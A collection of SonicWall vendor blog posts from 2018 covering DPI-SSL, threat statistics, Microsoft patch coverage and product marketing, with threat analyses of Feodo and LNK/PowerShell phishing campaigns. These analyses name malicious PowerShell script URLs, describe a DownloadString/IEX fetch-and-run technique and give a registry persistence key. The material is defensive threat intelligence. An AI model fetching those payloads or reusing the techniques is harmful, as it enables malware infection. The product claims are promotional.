How Everyone Can Implement SSL Decryption & Inspection

Since 2011, when Google announced it was switching to Hypertext Transfer Protocol Secure (HTTPS) by default, there has been a rapid increase in Secure Sockets Layer (SSL) sessions.

Initially, SSL sessions were reserved for only important traffic, where personal, financial or sensitive data was transferred. Now, it seems we can’t receive news or perform a simple search without an encrypted session.

In 2014 and 2015, SSL sessions accounted for about 52 percent of internet traffic. As cloud adoption grew, so did the SSL sessions. By 2017, SSL accounted for 68 percent of all internet traffic. Currently, SonicWall has seen encrypted traffic at almost 70 percent of the total traffic on the internet.

Secure sessions demonstrate that internet users are understanding and embracing session security and privacy. Unfortunately, as SSL sessions have increased, so have encrypted attacks. So far in 2018, SonicWall has seen a 275 percent increase of encrypted attacks since 2017. You find more numbers in the mid-year update of the 2018 SonicWall Cyber Threat Report.

What is DPI-SSL?

The modern cyber threat landscape requires a defense-in-depth posture, which includes SSL decryption capabilities to help organizations proactively use deep packet inspection of SSL (DPI-SSL) to block encrypted attacks.

However, even firewall vendors that claim to offer SSL decryption and inspection may not have the processing power to handle the volume of SSL traffic moving across a network today.

DPI-SSL extends SonicWall’s Deep Packet Inspection technology to inspect encrypted HTTPS and SSL/TLS traffic. The traffic is decrypted transparently, scanned for threats, re-encrypted and sent along to its destination if no threats or vulnerabilities are found.

Available on all SonicWall next-generation firewalls (Generation 6 or newer), DPI-SSL technology provides additional security, application control, and data leakage prevention for analyzing encrypted HTTPS and other SSL-based traffic.

It is important to have a secure and simple setup that minimizes configuration overhead and complexity. There are two primary paths for implementing DPI-SSL.

Option 1: Remote Implementation

Enabling DPI-SSL can sometimes be complex. Diverse sites and programs use certificates differently, some of which may be affected by DPI-SSL capabilities.

To confirm you have DPI-SSL implemented properly, leverage the SonicWall DPI-SSL Remote Implementation Service to ensure seamless and effective implementation of SonicWall DPI-SSL services.

The Remote Implementation Service for SonicWall DPI-SSL deploys and integrates the product into your environment within 10 business days. This service is delivered by Advanced Services Partners who have completed training and demonstrated expertise in DPI-SSL implementation and configuration.

Option 2: Leverage Easy-to-Use Guidance

For those considering in-house implementation, SonicWall also provides a number of knowledge base (KB) articles and resources that walk you through the DPI-SSL implementation process. Some of the most popular include:

These KBs, and others found within SonicWall’s support section or through the DPI-SSL Remote Implementation Service, ensure every type of user or organization has the resources  to properly activate DPI-SSL within their infrastructure to mitigate encrypted cyberattacks.

For additional guidance, watch “Initial DPI-SSL Configuration,” a popular SonicWall Firewall Series Tutorial.

DPI-SSL Adoption

Thankfully, SonicWall is witnessing gradual adoption of DPI-SSL add-on services. To best protect your environment, pair DPI-SSL capabilities with the Capture Advanced Threat Protection (ATP) cloud sandbox, Gateway Antivirus, Content Filtering and Intrusion Protection Services (IPS). All available in the SonicWall Advanced Gateway Security Suite, which delivers everything you need to protect your network from advanced cyberattacks.

Combine these services with a trusted and secure end-point protection software, such as SonicWall Capture Client, and you can provide a robust security posture that can protect devices — even when they are not behind your firewall.

August 2018 Cyber Threat Data: Monthly Attacks Slow, Yearly Volume Up Across the Board

As we inch toward the final stretch of the 2018 calendar, we’re gaining a better sense of the complete cyber threat landscape for the year.

SonicWall Capture Labs threat researchers continue to monitor year-to-date increases for global malware, ransomware, TLS/SSL encrypted attacks and intrusion attempts. In fact, year-to-date attacks are up at least 50 percent in every category compared to 2017.

Globally, the SonicWall Capture Threat Network, which includes more than 1 million sensors across the world, recorded the following 2018 year-to-date attack data through August 2018:

  • 7.8 billion malware attacks (70 percent increase from 2017)
  • 2.6 trillion intrusion attempts (54 percent increase)
  • 238.9 million ransomware attacks (108 percent increase)
  • 1.8 million encrypted threats (73 percent increase)

In August 2018 alone, the average SonicWall customer faced:

  • 2,075 malware attacks (1 percent decrease from July 2017)
  • 817,512 intrusion attempts (28 percent increase)
  • 55 ransomware attacks (41 percent decrease)
  • 49.6 encrypted threats (45 percent decrease)
  • 12.2 phishing attacks each day (37 percent decrease)

SonicWall Capture Security Center

SonicWall cyber threat intelligence is available in the SonicWall Security Center, which provides a graphical view of the worldwide attacks over the last 24 hours, countries being attacked and geographic attack origins. This view illustrates the pace and speed of the cyber arms race.

The resource provides actionable cyber threat intelligence to help organizations identify the types of attacks they need to be concerned about so they can design and test their security posture ensure their networks, data, applications and customers are properly protected.

Get the Mid-Year Update

Dive into the latest cybersecurity trends and threat intelligence from SonicWall Capture Labs. The mid-year update to the 2018 SonicWall Cyber Threat Report explores how quickly the cyber threat landscape has evolved in just a few months.

Importance of Resiliency in Network Security

In life we hear stories about people who are able to recover from difficult situations. They’re often referred to as being “resilient.” Resiliency can also be applied to network security, albeit in a slightly different context. In both cases it’s a good thing to be.

As noted in our mid-year 2018 SonicWall Cyber Threat Report, network threats, such as malware and ransomware attacks, are on the rise compared to 2017. Cybercriminals are persistent in their efforts to find new methods to launch their attacks.

But it’s not just the quantity of attacks that are on the rise. New threats are increasing as well. Some of these are variants spawned from earlier malware or ransomware code, such as WannaCry and Locky. Others are malware cocktails that combined pieces of code from several different variants.

Absorb, Reorganize and Refocus

One of the best and often under-valued ways to protect against these threats is to have a network security solution that is extremely resilient. This doesn’t mean that your firewall is good at picking itself back up off the ground after it’s been defeated by an attack.

According to NSS Labs, a third-party source known for its independent, fact-based cybersecurity guidance, “The resiliency of a system can be defined as its ability to absorb an attack and reorganize around a threat. A resilient device will be able to detect and prevent against different variations of the exploit.”

A key component of this definition is the device’s ability to identify attacks that use evasion techniques to avoid being detected and stopped. Another is protection over time. Some attacks are launched and then quickly disappear. Others, however, are reintroduced over the years, whether in their original form or as a variant.

A resilient firewall will continue to block a threat that was launched previously in addition to current and future variants. Failure to be resilient increases the chance your network is open to an attack. The odds may be small, but it’s still possible. Remember, not every hacker is writing the latest code. Some are new to the game and stick to older, established attacks.

Blocking Never-before-seen Variants

NSS Labs released the 2018 Next-Generation Firewall Group Test results with 10 network security vendors participating in the testing. SonicWall submitted the NSa 2650 next-generation firewall (NGFW), which performed very well in both security effectiveness and value (TCO per protected Mbps), earning the “Recommended” rating for a fifth time.

One particular area in the security effectiveness testing where the NSa 2650 shined was its resiliency to a range of never-before-seen exploit variants. The NSa 2650 achieved a block rate of over 90 percent, outperforming every other firewall except one. In many cases, the difference was significant, with over half of the firewalls scoring only in the 65-75 percent range.

Exploit Block Rate by Year – Recommended Policies
2018 NSS Labs Next-Generation Firewall Comparative Report: Security

So, is having a firewall with high resiliency really that important? Research from both SonicWall and NSS Labs indicates that there are quite a few aging attacks still out there in circulation. They may not be as sophisticated as today’s threats, but they remain active. You need to be protected against them.

What’s more, some threat actors launch multi-pronged attacks comprised of the core malware plus a series of variants. The idea is that your firewall may stop one, but not all.

To counter attacks, some security vendors create signatures that are specific to a particular exploit. These signatures typically don’t account for variants, however. And, over time, the signatures may be removed, leaving the firewall open to attack. Ideally, security vendors will create signatures that focus on the vulnerability and block the threat plus its variants — now and in the future.

If you’re not sure whether your firewall is resilient, or how it rates in security effectiveness and value, SonicWall can help. Visit SonicWall.com to download and read NSS Labs test reports, including the Security Value MapTM.

Active spam campaign spreading Feodo banking trojan spotted

The SonicWall Capture Labs Threat Research team has been observing an active spam campaign spreading a banking Trojan widely known as Feodo. This spam uses a very common tactic of sending a fake invoice or bank statement as an attachment with a link that leads to downloading malware.

Infection cycle:

The spam email purports to be from a bank or vendor or business supplier typically with a PDF or DOC attachment as show below.

Opening the PDF file, for instance, will then have a link to download your invoice or statement.

 

 

Clicking on the link will then download a document file which has embedded Visual Basic macros.

These macros will launch complex procedures when the document is opened. Macro security setting in the Trust Center is disabled by default and a security warning will appear once macro is detected within a document file. To circumvent this, the body of the document file actually instructs the victim to enable editing and enable content to view the document.

Once the Visual Basic script executes, cmd.exe is spawned which then executes powershell that will then download the banking Trojan.

Below is an example of what commands were executed by cmd and powershell to perform this malicious task:

It then executes the downloaded Feodo Trojan. The trojan copied itself as “pagesrouted.exe” and registered itself in the registry to ensure persistence.

  • HKLM/Software/Microsoft/Windows/CurrentVersion/Run  pagesrouted   “%APPDATA%/Local/Wndows/pagesrouted.exe”

During our analysis, the Trojan just runs quietly in the background. Once we opened a browser instance and logged onto an online banking website, it then contacted a known Feodo C&C server and sent encrypted data.

During the past week, we have observed this threat spread throughout the United States, Germany, India and Brazil.

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Feodo.S (Trojan)
  • GAV: Feodo.S _2 (Trojan)

 

Botnets Targeting Obsolete Software

Overview: This is not a disclosure of a new vulnerability in SonicWall software. Customers with the current SonicWall Global Management System (GMS) 8.2 and above have nothing to worry about. The reported vulnerability relates to an old version of GMS (8.1), which was replaced in December 2016. Customers with GMS 8.1 and earlier releases should patch, per SonicWall guidance, as they are running out-of-support software. Best practice is to deploy a SonicWall next-generation firewall (NGFW) or a web application firewall (WAF) in front of GMS and other web servers to protect against such attacks. Look for global third-party validation on protection effectiveness, such as the 2018 NSS Labs NGFW Group Test. After rigorous testing, SonicWall firewalls earned the NSS Labs coveted ‘Recommended’ rating five times.


On Sept. 9, Palo Alto Networks Unit 42 published a blog post highlighting a developing trend of botnets picking up publicly known CVE exploits and weaponizing them against enterprise infrastructure. This marks a change in the botnet authors’ tactics from targeting consumer-grade routers and IP cameras to searching for higher-profile enterprise targets to harness additional endpoints for DDoS attacks.

The first botnet, Mirai, targeted the Apache Struts vulnerability from early 2017, which affects web servers around the world. On March 6, 2017, SonicWall provided protection against the Apache Struts vulnerability with the Intrusion Prevention Service (IPS) on the NGFW line, rolling out protection to all firewalls with licensed IPS service.

The second botnet highlighted in the Palo Alto Networks post, Gafgyt, picked up the Metasploit code for an XML-RPC vulnerability for an obsolete version of SonicWall GMS (8.1) central management software, which was replaced by GMS 8.2 in December 2016.

The bottom line: the reported botnet attack is misguided and presents no threat to SonicWall GMS in production since December 2016.

Implementing Cybersecurity Best Practices

Current SonicWall GMS users are not at risk. However, there are broader lessons here for the industry and business owners:

  • Take End-of-Life and End-of-Support announcements seriously and update proactively. They become a compliance and security risk for critical systems and compromise an enterprise’s compliance and governance posture.
  • Security best practices dictate that you never expose a web server directly to the internet without a NGFW or WAF deployed in front.
  • A security layer between the internet and critical enterprise infrastructure, like web servers or centralized firewall management, provides the ability to virtually patch zero-day vulnerabilities and exploits while working out a sensible patching strategy. For example, a SonicWall NGFW with Intrusion Prevention or a SonicWall WAF can easily handle this task.

Using Third-Party Validation

The blog post does, however, underscore the rapidly-evolving nature of today’s threat landscape, evidenced by the mixing of malware and exploits to create new malware cocktails, and the need to use the latest and most effective security solutions to protect against them.

When selecting a product to protect your critical infrastructure, go beyond listening to vendor claims and look at globally recognized independent testing, such as the NSS Labs NGFW report, to validate security efficacy. Items that you should consider when selecting a security product for the modern threat landscape:

  1. NSS Labs specifically tests for protection on non-standard ports (not just 80/443, for example) because malware often uses non-standard ports to bypass traffic inspection. Products that lack inspection on non-standard ports are blind to many malware attacks, and are easily fooled into missing dangerous traffic and allowing malware and exploits to sail right through.

2018 NSS Labs NGFW Group Test Report — Evasion Resistance

2018 NSS Labs Next Generation Firewall Security Value MapTM (SVM)

  1. Evaluate your NGFW on security efficacy, and how it deals with malware cocktails, such as the recently exposed Intel-based, processor-level vulnerabilities like Spectre, Meltdown and Foreshadow.
  • SonicWall patented and patent-pending Real-Time Deep Memory Inspection (RTDMITM) technology is proven to catch chip/processor attacks through its unique approach to real-time memory inspection.
  • SonicWall RTDMI protection can also be applied to mitigate malicious PDFs, Microsoft Office documents and executables. The focus on PDF and Office document protection is especially important. Attacks are shifting into this delivery mechanism as browsers clamped down on Flash and Java content, drying up a fertile area of exploit and malware delivery. For example, RTDMI discovered more than 12,300 never-before-seen attack variants in the first half of 2018 alone.
  • The SonicWall Capture Client endpoint suite plugs into the RTDMI engine to offer the same protection for users that are outside a protected network.

 

The Bottom Line

The reported botnet attack is misguided and presents no threat to SonicWall GMS in production since December 2016.

Microsoft Security Bulletin Coverage for September 2018

SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of September 2018. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2018-0965 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8269 OData Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8271 Windows Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8315 Microsoft Scripting Engine Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8331 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8332 Win32k Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8335 Windows SMB Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8336 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8337 Windows Subsystem for Linux Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8354 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8366 Microsoft Edge Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8367 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13598 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 3
CVE-2018-8391 Scripting Engine Memory Corruption Vulnerability
IPS 13599 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 4
CVE-2018-8392 Microsoft JET Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8393 Microsoft JET Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8409 ASP.NET Core Denial of Service
There are no known exploits in the wild.
CVE-2018-8410 Windows Registry Elevation of Privilege Vulnerability
ASPY 5251 : Malformed-File exe.MP.36
CVE-2018-8419 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8420 MS XML Remote Code Execution Vulnerability
IPS  13600 : MS XML Remote Code Execution Vulnerability (SEP 18)
CVE-2018-8421 .NET Framework Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8423 Microsoft JET Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8424 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8425 Microsoft Edge Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2018-8426 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2018-8428 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8429 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8430 Word PDF Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8431 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8433 Microsoft Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8434 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8435 Windows Hyper-V Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8436 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8437 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8438 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8439 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8440 Windows ALPC Elevation of Privilege Vulnerability
GAV 2809 : Injector.PC
CVE-2018-8441 Windows Subsystem for Linux Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8442 Windows Kernel Information Disclosure Vulnerability
SPY 5252 : Malformed-File exe.MP.37
CVE-2018-8443 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8444 Windows SMB Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8445 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8446
There are no known exploits in the wild.
CVE-2018-8447 Internet Explorer Memory Corruption Vulnerability
IPS 13601 : Internet Explorer Memory Corruption Vulnerability (SEP 18) 1
CVE-2018-8449 Device Guard Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8452 Scripting Engine Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8455 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8456 Scripting Engine Memory Corruption Vulnerability
IPS 13602 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 5
CVE-2018-8457 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8459 Scripting Engine Memory Corruption Vulnerability
IPS 13603 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 6
CVE-2018-8461 Internet Explorer Memory Corruption Vulnerability
IPS 13604 : Internet Explorer Memory Corruption Vulnerability (SEP 18) 2
CVE-2018-8462 DirectX Graphics Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8463 Microsoft Edge Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8464 Microsoft Edge PDF Remote Code Execution Vulnerability
ASPY 5244 : Malformed-File pdf.MP.320
CVE-2018-8465 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8466 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13594 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 1
CVE-2018-8467 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13595 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 2
CVE-2018-8468 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8469 Microsoft Edge Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8470 Internet Explorer Security Feature Bypass Vulnerability
IPS 13597 : Internet Explorer Security Feature Bypass Vulnerability (SEP 18)
CVE-2018-8474 Lync for Mac 2011 Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8475 Windows Remote Code Execution Vulnerability
ASPY 5253 : Malformed-File tif.MP.23
CVE-2018-8479 Azure IoT SDK Spoofing Vulnerability
There are no known exploits in the wild.

New Phishing Campaign Leverages Fileless PowerShell execution using LNK

SonicWall has recently spotted a new phishing email campaign spreading actively in the last few days. Malicious email, disguised as a legitimate invoice payment or FedEx receipt, delivers a RAR attachment to the targeted users. Upon extraction of the RAR File, user would see a LNK file that looks like a legit document. LNK file then remotely executes a fileless PowerShell script to download an initial payload. This initial payload then brings down multiple payloads, runs shell code and connects to a command and control (C&C) server, which allows the remote attacker access to the compromised computer

 

Figure 1: Multi stage attack leveraging LNK files

 

Phishing Email Campaign: 

Phishing email is the most popular tactic for tricking users into clicking malicious content It is also determined to be the initial infection vector for most compromises. Attackers trick email recipients into clicking on an attachment or URL in order to infect their computer or steal information. In this phishing campaign, Fedex receipt or Invoice payment receipt has been sent out to targeted victims. 

Figure 2: Phishing email used in this campaign

Emails are sent with RAR attachment which when extracted delivers two LNK files.

Figure 3: Link files extracted from RAR attachment

 

LNK file:

LNK is a file extension for a shortcut file used by Microsoft Windows to point to an executable file or an application. LNK files are generally used to create start menu and desktop shortcuts. LNK stands for LiNK.

In this case, LNK files are disguised like a legitimate document by changing the icon using the image resource dll [%SystemRoot%\System32\imageres.dll ] as shown below

Figure 4: LNK file icon has been modified to look like a legit document

 

 Fileless PowerShell Attack:

In this version, LNK file executes PowerShell.exe.

Figure 6: Fileless PowerShell script execution with IEX

 

Fileless malware attack occurs by loading malware into memory without writing to disk. Since file never gets into disk, this goes undetected by file based detection. In the above given PowerShell command,
DownloadString method is used to download the content from a remote location (‘http://dataishwar.in/ju/jjl.ps1’) to a buffer $wcli in memory. In this case, even having rules to block execution of certain extension such as .ps1 wouldn’t work as ‘Invoke EXpression (IEX)’ is used.

The IEX Invoke-Expression cmdlet in PowerShell evaluates or runs a specified string as a command and returns the results of the expression.

Malicious PowerShell Script is copied from the remote location and gets executed from memory. It then downloads more malicious payloads to compromise the user machine.

 

Threat Graph:

Looks like the attacker has hacked into a legitimate site ‘http://dataishwar.in’ & hosted malicious PowerShell scripts and payloads in it.  Based on the samples seen date, it must be active since July.

Figure 7: Threat intelligence graph from VirusTotal

Hash:

  • 77952875afc68bc3f5aebd99019ea9afda995a17dfb75b6d8de1bd24a70790ff

Listed below are other malicious PowerShell scripts hosted in the same website:

  • http://dataishwar.in/mlioc/ortsd.ps
    First Seen: 2018-09-04 09:08:43
  • http://dataishwar.in/yiu/orrd.ps1
    First Seen: 2018-09-02 08:04:18
  • http://dataishwar.in/mlioc/ortsd.ps1
    First Seen: 2018-09-03 08:46:29
  • http://dataishwar.in/cxs/oise.ps1
    First Seen: 2018-09-02 10:39:05

Trend Graph:

SonicWall has observed a spike in detection in the last few days. 

Figure 7: Hits graph

 

Sonicwall Threat Research Lab provides protection against this exploit with the following signatures:

  • GAV 7968: Downloader.FBQH
  • IPS 13513: LNK Remote Code Execution (JUN 17) 1
  • IPS 13514: LNK Remote Code Execution (JUN 17) 2

Cyber Security News & Trends

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.


SonicWall Spotlight

Cybersecurity and the future of work: How much can we predict? – Silicon Republic (Ireland)

  • SonicWall CEO Bill Conner, talking to Silicon Republic, shares his thoughts on battling the growth areas of cybercrime over the coming years.

US Indicts North Korean Over Sony, Bank and WannaCry Attacks – Infosecurity magazine

  • The U.S. Justice Department has formally charged a hacker in connection with cybercrimes that they are directly connecting to the North Korean government. SonicWall’s Bill Conner is featured as a security expert on the issue.

Cyber Security News

British Airways boss apologises for ‘malicious’ data breach – BBC

  • A week after the Air Canada security leak another major security breach in an Airline, this time British Airways, has been dominating news headlines. Names, email address and credit card information from over 380,000 transactions have been compromised.

Nope, the NSA isn’t sitting in front of a supercomputer hooked up to a terrorist’s hard drive – The Register

  • The Register talks about what exactly Government intelligence services want versus what it’s likely they will be able to get in the current digital climate.

The Case for a National Cybersecurity Agency – Politico

  • Gen. David Petraeus argues in Politico that national cybersecurity is in need of a complete overhaul with the creation of an independent National Cybersecurity Agency that reports directly to the President.

FIN6 returns to attack retailer point of sale systems in US, Europe – ZDNet

  • Point of Sale (POS) malware is really gathering steam. ZDNet have a report on a new campaign by a cybercriminal group called FIN6 who were previously known for selling credit card numbers on the Dark Web.

More U.S. Cities Brace for ‘Inevitable’ Hackers – The Wall Street Journal

  • After the city of Atlanta paid millions of dollars to ransomware attackers this year other U.S. Cities are considering their options on how to handle cyberattacks.

Obama-Themed Ransomware Also Mines for Monero – BankInfoSecurity

  • They’re calling it Barack Obama’s Everlasting Blue Blackmail Virus and it doubles as a cryptocurrency miner on top of being ransomware.

In Case You Missed It

Infographic: Ransomware’s Devastating Impact on Real-World Businesses

Still relatively new to the cyber threat landscape, ransomware continues to be one of the high-profile malware types that grab headlines. It’s one part Hollywood-style drama mixed with the “mystery” of cryptocurrencies and the seemingly personal nature of ransomware attacks.

But it’s not hyperbole. Ransomware remains one of the most malicious cyberattacks that can cripple a business. SonicWall’s new infographic highlights composite data that demonstrates how ransomware impacts businesses’ ability to operate.

So, how do you prevent your organization from being severely disrupted by ransomware? The best approach is to use multiple layers that deliver automated, real-time breach detection and prevention. While this isn’t an exhaustive list of all security options, these cornerstone tactics will mitigate most of today’s most malicious cyberattacks, including ransomware.

How to Block Ransomware

Businesses have no choice but to proactively mitigate ransomware attacks. But is there a proven approach that can cost-effectively scale across networks and endpoints? Four key security capabilities make full ransomware protection possible.

  1. Next-Generation Firewall

    Detect and prevent cyberattacks with power, speed and precision.
    Next-generation firewalls (NGFW) are one of your first lines of defense against hackers, cybercriminals and threat actors.

    For example, SonicWall firewalls deliver real-time, cloud-based threat prevention, while augmenting the security from on-box deep packet inspection of SSL traffic (DPI-SSL). And all new SonicWall firewalls integrate with our award-winning network sandbox for advanced threat protection.

  2. Network Sandbox

    Identify and stop unknown attacks in real time.
    A network sandbox is an isolated environment on the firewallthat runs files to monitor their behavior. SonicWall Capture Advanced Threat Protection (ATP) is a multi-engine sandbox service that holds suspicious files at the gateway until a verdict can be achieved.

    Capture ATP also features Real-Time Deep Memory InspectionTM (RTDMI). RTDMI is a memory-based malware analysis engine that catches more malware, and faster, than behavior-based sandboxing methods. It also delivers a lower false-positive rate to improve security and the end-user experience.

  3. Email Security

    Filter email-borne attacks before they hit your network.
    Secure email solutions deliver comprehensive inbound and outbound protection from advanced cyberattacks, including ransomware, phishing, business email compromise (BEC), spoofing, spam and viruses. Proven solutions will be available in on-premise email security appliances and hosted secure email.

    SonicWall Email Security also integrates with Capture ATP to protect email from advanced threats, such as ransomware and zero-day malware.

  4. Advanced Endpoint Client Security

    Block ransomware before it compromises user devices.
    Traditional antivirus (AV) has been trusted for years to protect computers. This was a sound approach when the total number of signatures required numbered in the hundreds of thousands. Today, millions of new forms of malware are discovered each month.

    To protect endpoints from this endless onslaught of malware attacks, SonicWall recommends using a next-generation antivirus (NGAV) solution that can monitor the behavior of a system to look for malicious activities, such as the unauthorized encryption of your files.

    For example, SonicWall Capture Client delivers advanced malware protection and additional security capabilities for SonicWall firewall

Ransomware remains one of the most damaging cyberattacks to businesses. Follow these four ransomware protection best practices to help ensure ransomware does not impact your ability to operate.

4 Ways to Protect Your Virtualized Infrastructure

Adopting a virtualized infrastructure is well established as a cost- and space-savings model, but there are additional benefits as well. Whether you are using virtual servers deployed in the cloud or on-premises, there are proven best practices to help you maintain the security posture that operate and protect virtual environments.

While physical appliances remain as powerful workforces, they sometimes require certain network traffic configurations to ensure they can properly protect and integrate with virtual environments

Virtual firewalls, like the SonicWall NSv, are the No. 1 type of virtual appliance being deployed across environments. Securing an environment requires looking at all types of access and uses, such as remote access, communications and management.

SonicWall network security solutions operate and protect virtual environments in four categories:

  • Security: Network Security Virtual Firewall protects virtual environments at an intra-VLAN level.
  • Email: Email Security solution protects organizations against spam, viruses, phishing, ransomware and malware that enter through email. The solution can integrate seamlessly with Microsoft Office 365 and other on-premise and cloud email providers.
  • Remote Access: Secure Mobile Access provides anytime, anywhere access for any device to securely access an organization’s internal resources while the Web Application Firewall gives organizations the necessary controls around their forward-facing offerings.
  • Management: NSv deployments may be centrally managed using the on-premise SonicWall Global Management System (GMS) and the SonicWall Capture Security Center, an open, scalable cloud security management, monitoring, reporting and analytics software delivered as a cost-effective service offering. Capture Security Center gives the ultimate in visibility, agility and capacity to govern the entire SonicWall virtual and physical firewall ecosystem with greater clarity, precision, and speed — all from a single pane of glass.

SonicWall works diligently to ensure customers have access to best-in-class professional services delivered by Authorized Services Partners. These security solutions are optimized within virtual environments.

As Infrastructure as a Service (Iaas) offerings and cloud-based providers continue to grow, implementing trusted SonicWall platforms to protect, secure and manage your environment will allow you to grow and be more mobile through SonicWall’s virtualized product offerings.

Request a demo or trial of these products from your local partner or reach out to the Partner Enabled Services team to help you secure your virtualized environment through SonicWall Partner Enabled Services.